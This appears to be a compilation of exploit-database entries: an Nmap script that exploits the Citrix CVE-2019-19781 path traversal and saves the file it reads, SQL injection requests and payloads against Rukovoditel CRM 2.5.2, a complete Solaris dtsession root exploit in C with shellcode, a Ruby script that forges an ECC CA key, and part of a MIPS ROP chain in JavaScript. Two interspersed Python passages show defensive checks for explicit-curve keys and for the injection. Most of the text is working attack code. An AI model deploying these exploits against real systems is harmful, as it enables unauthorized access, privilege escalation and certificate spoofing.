          -- </table>
          -- <table key="dates">
          -- <table key="disclosure">
          -- <elem key="year">2019</elem>
          -- <elem key="day">17</elem>
          -- <elem key="month">12</elem>
          -- </table>
          -- </table>
          -- <elem key="disclosure">17-12-2019</elem>
          -- <table key="extra_info">
          -- </table>
          -- <table key="refs">
          -- <elem>https://support.citrix.com/article/CTX267027</elem>
          -- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>
          -- </table>
          -- </table>

          author = "Dhiraj Mishra (@RandomDhiraj)"
          Discovery = "Mikhail Klyuchnikov (@__Mn1__)"
          license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
          categories = {"discovery", "intrusive","vuln"}

          portrule = shortport.ssl

          action = function(host,port)
            local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil
            local vuln = {
              title = 'Citrix ADC Path Traversal',
              state = vulns.STATE.NOT_VULN,
              description = [[
          Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are vulnerable to an unauthenticated path
          traversal vulnerability that allows attackers to read configurations or any other file.
              ]],
              references = {
                'https://support.citrix.com/article/CTX267027',
                'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',
              },
              dates = {
                disclosure = {year = '2019', month = '12', day = '17'},
              },
            }
            local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
            local path = "/vpn/../vpns/cfg/smb.conf"
            local response
            local output = {}
            local success = "Host is vulnerable to CVE-2019-19781"
            local fail = "Host is not vulnerable"
            -- literal "[global]" section header; the brackets must be escaped because
            -- "[...]" is a character class in Lua patterns and would match almost any body
            local match = "%[global%]"
            local credentials
            local citrixADC
            response = http.get(host, port.number, path)

            if not response.status then
              stdnse.print_debug("Request Failed")
              return
            end
            if response.status == 200 then
              if string.match(response.body, match) then
                stdnse.print_debug("%s: %s GET %s - 200 OK", SCRIPT_NAME,host.targetname or host.ip, path)
                vuln.state = vulns.STATE.VULN
                citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path))
                if outputFile then
                  credentials = response.body:gsub('%W','.')
                  vuln.check_results = stdnse.format_output(true, citrixADC)
                  vuln.extra_info = stdnse.format_output(true, "Credentials are being stored in the output file")
                  local file = io.open(outputFile, "a")
                  file:write(credentials, "\n")
                  file:close()
                else
                  vuln.check_results = stdnse.format_output(true, citrixADC)
                end
              end
            elseif response.status == 403 then
              stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname or host.ip, path, response.status)
              vuln.state = vulns.STATE.NOT_VULN
            end
            return vuln_report:make_output(vuln)
          end
  12. # Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'entities_id' SQL Injection
      # Google Dork: N/A
      # Date: 2020-01-15
      # Blog: https://fatihhcelik.blogspot.com/
      # Exploit Author: Fatih Çelik
      # Vendor Homepage: https://www.rukovoditel.net/
      # Software Link: https://sourceforge.net/projects/rukovoditel/
      # Version: 2.5.2
      # Tested on: Kali Linux
      # CVE : N/A

      # Request,

          GET /ruko/index.php?module=entities/fields&entities_id=25 HTTP/1.1
          Host: 127.0.0.1
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          Referer: http://127.0.0.1/ruko/index.php?module=entities/fields&entities_id=25
          Connection: close
          Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver
          Upgrade-Insecure-Requests: 1
          Cache-Control: max-age=0

      # PAYLOADS,

      # Parameter: entities_id (GET)
      # Type: boolean-based blind
      # Title: AND boolean-based blind - WHERE or HAVING clause
      Payload: module=entities/fields&entities_id=25' AND 2091=2091 AND 'emRY'='emRY

      # Type: error-based
      # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
      Payload: module=entities/fields&entities_id=25' AND (SELECT 2023 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(2023=2023,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZZpM'='ZZpM

      # Type: time-based blind
      # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
      Payload: module=entities/fields&entities_id=25' AND (SELECT 5681 FROM (SELECT(SLEEP(5)))rdOz) AND 'vWza'='vWza

      # Type: UNION query
      # Title: Generic UNION query (NULL) - 23 columns
      Payload: module=entities/fields&entities_id=25' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b706a71,0x5a664143527068525459496254624c514e45694d42776a6d67614a68434c6762434f62514d4f4566,0x7162787871),NULL-- syQw
  13. # Exploit: SunOS 5.10 Generic_147148-26 - Local Privilege Escalation
      # Date: 2020-01-15
      # Author: Marco Ivaldi
      # Vendor: www.oracle.com
      # Software Link: https://www.oracle.com/technetwork/server-storage/solaris10/downloads/latest-release/index.html
      # CVE: CVE-2020-2696

          /*
           * raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel
           * Copyright (c) 2019-2020 Marco Ivaldi <[email protected]>
           *
           * A buffer overflow in the CheckMonitor() function in the Common Desktop
           * Environment 2.3.1 and earlier and 1.6 and earlier, as distributed with
           * Oracle Solaris 10 1/13 (Update 11) and earlier, allows local users to gain
           * root privileges via a long palette name passed to dtsession in a malicious
           * .Xdefaults file (CVE-2020-2696).
           *
           * "I always loved Sun because it was so easy to own. Now with Solaris 11 I
           * don't like it anymore." -- ~B.
           *
           * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
           * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
           * space, try returning to sprintf() instead of strcpy().
           *
           * I haven't written a Solaris/SPARC version because I don't have a SPARC box
           * on which Solaris 10 can run. If anybody is kind enough to give me access to
           * such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
           *
           * Usage:
           * $ gcc raptor_dtsession_ipa.c -o raptor_dtsession_ipa -Wall
           * [on your xserver: disable the access control]
           * $ ./raptor_dtsession_ipa 192.168.1.1:0
           * [...]
           * # id
           * uid=0(root) gid=1(other)
           * #
           *
           * Tested on:
           * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
           * [previous Solaris versions are also likely vulnerable]
           */

          #include <fcntl.h>
          #include <link.h>
          #include <procfs.h>
          #include <stdio.h>
          #include <stdlib.h>
          #include <strings.h>
          #include <unistd.h>
          #include <sys/stat.h>
          #include <sys/systeminfo.h>
          #include <sys/types.h>

          #define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel"
          #define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <[email protected]>"

          #define VULN "/usr/dt/bin/dtsession" // the vulnerable program
          #define BUFSIZE 256 // size of the palette name
          #define PADDING 3 // padding in the palette name
          #define PAYSIZE 1024 // size of the payload
          #define OFFSET env_len / 2 // offset to the shellcode

          char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
          /* double setuid() */
          "\x31\xc0\x50\x50\xb0\x17\xcd\x91"
          "\x31\xc0\x50\x50\xb0\x17\xcd\x91"
          /* execve() */
          "\x31\xc0\x50\x68/ksh\x68/bin"
          "\x89\xe3\x50\x53\x89\xe2\x50"
          "\x52\x53\xb0\x3b\x50\xcd\x91";

          /* globals */
          char *env[256];
          int env_pos = 0, env_len = 0;

          /* prototypes */
          int add_env(char *string);
          void check_zero(int addr, char *pattern);
          int search_ldso(char *sym);
          int search_rwx_mem(void);
          void set_val(char *buf, int pos, int val);

          /*
           * main()
           */
          int main(int argc, char **argv)
          {
              char buf[BUFSIZE], payload[PAYSIZE];
              char platform[256], release[256], display[256];
              int i, payaddr;
              char *arg[2] = {"foo", NULL};
              int sb = ((int)argv[0] | 0xfff); /* stack base */
              int ret = search_ldso("strcpy"); /* or sprintf */
              int rwx_mem = search_rwx_mem(); /* rwx memory */
              FILE *fp;
              char palette_file[BUFSIZE + 18];

              /* print exploit information */
              fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

              /* read command line */
              if (argc != 2) {
                  fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
                  exit(1);
              }
              sprintf(display, "DISPLAY=%s", argv[1]);

              /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
              memset(payload, '\x90', PAYSIZE);
              payload[PAYSIZE - 1] = 0x0;
              memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));

              /* fill the envp, keeping padding */
              add_env(payload);
              add_env(display);
              add_env("HOME=/tmp");
              add_env(NULL);

              /* calculate the payload address */
              payaddr = sb - OFFSET;

              /* prepare the evil palette name */
              memset(buf, 'A', sizeof(buf));
              buf[sizeof(buf) - 1] = 0x0;

              /* fill with function address in ld.so.1, saved eip, and arguments */
              for (i = PADDING; i < BUFSIZE - 16; i += 4) {
                  set_val(buf, i, ret); /* strcpy */
                  set_val(buf, i += 4, rwx_mem); /* saved eip */
                  set_val(buf, i += 4, rwx_mem); /* 1st argument */
                  set_val(buf, i += 4, payaddr); /* 2nd argument */
              }

              /* prepare the evil .Xdefaults file */
              fp = fopen("/tmp/.Xdefaults", "w");
              if (!fp) {
                  perror("error creating .Xdefaults file");
                  exit(1);
              }
              fprintf(fp, "*0*ColorPalette: %s\n", buf); // or *0*MonochromePalette
              fclose(fp);

              /* prepare the evil palette file (badchars currently not handled) */
              mkdir("/tmp/.dt", 0755);
              mkdir("/tmp/.dt/palettes", 0755);
              sprintf(palette_file, "/tmp/.dt/palettes/%s", buf);
              fp = fopen(palette_file, "w");
              if (!fp) {
                  perror("error creating palette file");
                  exit(1);
              }
              fprintf(fp, "Black\n");
              fclose(fp);

              /* print some output */
              sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
              sysinfo(SI_RELEASE, release, sizeof(release) - 1);
              fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
              fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
              fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
              fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
              fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);

              /* run the vulnerable program */
              execve(VULN, arg, env);
              perror("execve");
              exit(0);
          }

          /*
           * add_env(): add a variable to envp and pad if needed
           */
          int add_env(char *string)
          {
              int i;

              /* null termination */
              if (!string) {
                  env[env_pos] = NULL;
                  return env_len;
              }

              /* add the variable to envp */
              env[env_pos] = string;
              env_len += strlen(string) +
1; env_pos++; /* pad the envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_zero(): check an address for the presence of a 0x00 */ void check_zero(int addr, char *pattern) { if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || !(addr & 0xff000000)) { fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); exit(1); } } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); check_zero(addr - 4, sym); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, O_RDONLY)) < 0) { fprintf(stderr, "can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NULL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = 
(val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; }
14. # EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47933.zip

require 'openssl'

raw = File.read "ca.crt"
ca_cert = OpenSSL::X509::Certificate.new(raw)

# Parse public key from CA
ca_key = ca_cert.public_key
if !(ca_key.instance_of? OpenSSL::PKey::EC) then
  puts "CA NOT ECC"
  puts "Type: " + ca_key.inspect
  exit
end

# Set new group with fake generator G = Q
ca_key.private_key = 1
group = ca_key.group
group.set_generator(ca_key.public_key, group.order, group.cofactor)
group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE
ca_key.group = group

puts ca_key.to_pem
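The script above keeps the CA's public point Q but swaps the curve's generator and re-encodes the parameters as an explicit curve rather than a named one. A verifier that matches a presented key against a trusted key by its public-point bytes alone, without also comparing the curve parameters, has no way to tell the two apart. The check a defender wants is therefore on the parameters field of the SubjectPublicKeyInfo: a trust anchor's EC key must name its curve by OID, never carry explicit parameters. The following is an added example written for this page, not part of the EDB entry or of OpenSSL; it uses a small hand-written DER reader and encoder, constructs the sample SPKI blobs itself (the explicit-parameter sample uses placeholder field values, only its shape matters), and all function and constant names are this example's own.

```python
# Classify how an EC SubjectPublicKeyInfo (DER) specifies its curve.
# Added example: the DER helpers, names and sample blobs are all constructed here.

SEQUENCE, OID, BIT_STRING, INTEGER, OCTET_STRING = 0x30, 0x06, 0x03, 0x02, 0x04
OID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")  # 1.2.840.10045.2.1 (ecPublicKey)
OID_PRIME256V1 = bytes.fromhex("2a8648ce3d030107")   # 1.2.840.10045.3.1.7 (P-256)
OID_PRIME_FIELD = bytes.fromhex("2a8648ce3d0101")    # 1.2.840.10045.1.1 (prime-field)


def der_tlv(tag, content):
    """Minimal DER encoder: one tag byte, definite-form length, content."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def der_read(buf, pos=0):
    """Decode one TLV starting at pos; return (tag, content, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                      # long-form length
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length


def ec_curve_encoding(spki):
    """Return 'named', 'explicit', 'implicit' or 'not-ec' for a DER SPKI.

    SPKI ::= SEQUENCE { AlgorithmIdentifier, subjectPublicKey BIT STRING }
    AlgorithmIdentifier ::= SEQUENCE { algorithm OID, parameters ECParameters }
    ECParameters is an OID (namedCurve), a SEQUENCE (specifiedCurve) or NULL/absent.
    """
    tag, body, _ = der_read(spki)
    if tag != SEQUENCE:
        raise ValueError("SPKI is not a SEQUENCE")
    tag, alg, _ = der_read(body)
    if tag != SEQUENCE:
        raise ValueError("AlgorithmIdentifier is not a SEQUENCE")
    tag, oid, pos = der_read(alg)
    if tag != OID or oid != OID_EC_PUBLIC_KEY:
        return "not-ec"
    if pos >= len(alg):
        return "implicit"                 # implicitlyCA: also not allowed by RFC 5480
    ptag, _, _ = der_read(alg, pos)
    if ptag == OID:
        return "named"
    if ptag == SEQUENCE:
        return "explicit"
    raise ValueError("unexpected ECParameters tag 0x%02x" % ptag)


def acceptable_ca_key(spki):
    """Policy: a trust anchor's EC key must use a named curve, nothing else."""
    return ec_curve_encoding(spki) == "named"


def build_spki(params, point):
    """Assemble a SPKI from an ECParameters encoding and an uncompressed point."""
    alg = der_tlv(SEQUENCE, der_tlv(OID, OID_EC_PUBLIC_KEY) + params)
    return der_tlv(SEQUENCE, alg + der_tlv(BIT_STRING, b"\x00" + point))


# Constructed samples. POINT is a dummy uncompressed-point placeholder: the
# classification depends only on the parameters field, never on the point.
POINT = b"\x04" + b"\x11" * 32 + b"\x22" * 32
NAMED_SPKI = build_spki(der_tlv(OID, OID_PRIME256V1), POINT)

# specifiedCurve shape: SEQUENCE { version, fieldID, curve, base, order, cofactor }.
# Field values are placeholders; a real one would carry the attacker-chosen base point.
EXPLICIT_PARAMS = der_tlv(SEQUENCE,
    der_tlv(INTEGER, b"\x01")                                             # version
    + der_tlv(SEQUENCE, der_tlv(OID, OID_PRIME_FIELD) + der_tlv(INTEGER, b"\x7f"))  # fieldID
    + der_tlv(SEQUENCE, der_tlv(OCTET_STRING, b"\x00") + der_tlv(OCTET_STRING, b"\x00"))  # curve a, b
    + der_tlv(OCTET_STRING, POINT)                                        # base point G
    + der_tlv(INTEGER, b"\x7f")                                           # order
    + der_tlv(INTEGER, b"\x01"))                                          # cofactor
EXPLICIT_SPKI = build_spki(EXPLICIT_PARAMS, POINT)

if __name__ == "__main__":
    for label, blob in (("named", NAMED_SPKI), ("explicit", EXPLICIT_SPKI)):
        print(label, ec_curve_encoding(blob), "acceptable:", acceptable_ca_key(blob))
```

In a real deployment the SPKI bytes come from the certificate (the DER of its subjectPublicKeyInfo field); the point of keeping the classifier independent of any crypto library is that it can run in a log pipeline or a certificate-inventory job and flag every explicit-curve key, which should never appear in a trust store.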
15. # Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A

# Request,

POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 125
Connection: close
Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver

page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D=

# PAYLOADS,

# Parameter: filters[1][value] (POST)

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm

# Parameter: filters[0][value] (POST)

# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1
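Every payload in the advisory rides on the same thing: PHP turns `filters[i][name]` / `filters[i][value]` into a nested `$_POST['filters']` array, and the listing code interpolates those values into the WHERE clause. The fix on the application side is two-fold: the column name must come from an allowlist rather than from the request, and the value must be bound as a query parameter so that `1' AND (SELECT ... SLEEP(5))` can only ever be compared as a string. The following is an added example written for this page in Python with sqlite3, not Rukovoditel's own (PHP/MySQL) code: it decodes the advisory's request body the way PHP would, validates each filter, and runs a parameterized query against a constructed in-memory table. The allowlist, the column types and the sample rows are assumptions made for the example.

```python
# Added example: PHP-style filters[] decoding, allowlist validation and a
# parameterized query. Table layout, allowlist and sample rows are constructed.
import re
import sqlite3
from urllib.parse import parse_qsl

# Constructed sample bodies: the benign request from the advisory and one of
# its listed payloads (filters[0][value], boolean-based blind).
BENIGN_BODY = ("page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1"
               "&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D=")
INJECTED_BODY = ("page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#"
                 "&filters[1][name]=users_id&filters[1][value]=1")

_KEY_RE = re.compile(r"^filters\[(\d+)\]\[(name|value)\]$")


def parse_filters(body):
    """Decode filters[i][name]/filters[i][value] pairs the way PHP builds the
    nested $_POST['filters'] array; unrelated keys such as page= are ignored."""
    by_index = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = _KEY_RE.match(key)
        if m:
            by_index.setdefault(int(m.group(1)), {})[m.group(2)] = value
    return [by_index[i] for i in sorted(by_index)]


# Allowlist (assumed for the example): which columns may be filtered and what
# their values must look like. Both are treated as integer columns here.
ALLOWED_COLUMNS = {"type": re.compile(r"^\d+$"), "users_id": re.compile(r"^\d*$")}


def validate_filters(filters):
    """Return a list of problems; an empty list means every filter is acceptable."""
    problems = []
    for f in filters:
        name, value = f.get("name", ""), f.get("value", "")
        if name not in ALLOWED_COLUMNS:
            problems.append("unknown column %r" % name)
        elif not ALLOWED_COLUMNS[name].match(value):
            problems.append("value for %s is not numeric: %r" % (name, value))
    return problems


def query_login_log(conn, filters):
    """Hardened listing query: column names come only from the allowlist, values
    are bound as parameters, so request data can never become SQL text."""
    problems = validate_filters(filters)
    if problems:
        raise ValueError("; ".join(problems))
    clauses, params = [], []
    for f in filters:
        if f["value"] == "":          # empty filter value means "no filter"
            continue
        clauses.append("%s = ?" % f["name"])
        params.append(int(f["value"]))
    sql = "SELECT id, users_id, type FROM users_login_log"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return conn.execute(sql + " ORDER BY id", params).fetchall()


def demo_db():
    """Constructed in-memory table standing in for the login log."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_login_log (id INTEGER, users_id INTEGER, type INTEGER)")
    conn.executemany("INSERT INTO users_login_log VALUES (?, ?, ?)",
                     [(1, 1, 1), (2, 1, 0), (3, 2, 1)])
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print("benign:", query_login_log(conn, parse_filters(BENIGN_BODY)))
    try:
        query_login_log(conn, parse_filters(INJECTED_BODY))
    except ValueError as e:
        print("rejected:", e)
```

Note that `parse_qsl` splits each pair at the first `=` only, so the `4511=4511` inside the payload survives as part of the value exactly as PHP would see it; the rejection comes from the allowlist, and even a filter that slipped past validation would still be bound as a parameter rather than concatenated.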
16. // EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47936.zip

function buf2hex(buffer) { // buffer is an ArrayBuffer
  return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join('');
}

function insertAt(arr, index, toInsert) {
  for(let i = 0; i < toInsert.length; i++) {
    arr[i+index]= toInsert[i];
  }
}

function testEqual(buf1, buf2) {
  if (buf1.byteLength != buf2.byteLength) return false;
  var dv1 = new Int8Array(buf1);
  var dv2 = new Int8Array(buf2);
  for (var i = 0 ; i != buf1.byteLength ; i++) {
    if (dv1[i] != dv2[i]) return false;
  }
  return true;
}

arr = new Uint8Array(0xd00);
arr.fill(0x41)

firstSp = 0x00
previousSp = firstSp
sp = previousSp+0xa0
insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64])
insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) // 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;

previousSp = sp
sp = previousSp+0x20
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) //0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) //0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c])
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) //0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30;

previousSp = sp
sp = previousSp+0x30
insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call Socket

//0x80a05b20
socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20]
previousSp = sp
sp = previousSp+0x10
insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr
insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5
insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp+0x80
insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) //0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;

//0x80a05a30;
serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30];
previousSp = sp
sp = previousSp+0x20
insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr
insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80;

previousSp = sp
sp = previousSp + 0x80
insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c]) //0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68]) //0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp + 0x10
insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8])
insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) //0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;

previousSp = sp
sp = previousSp+0x10
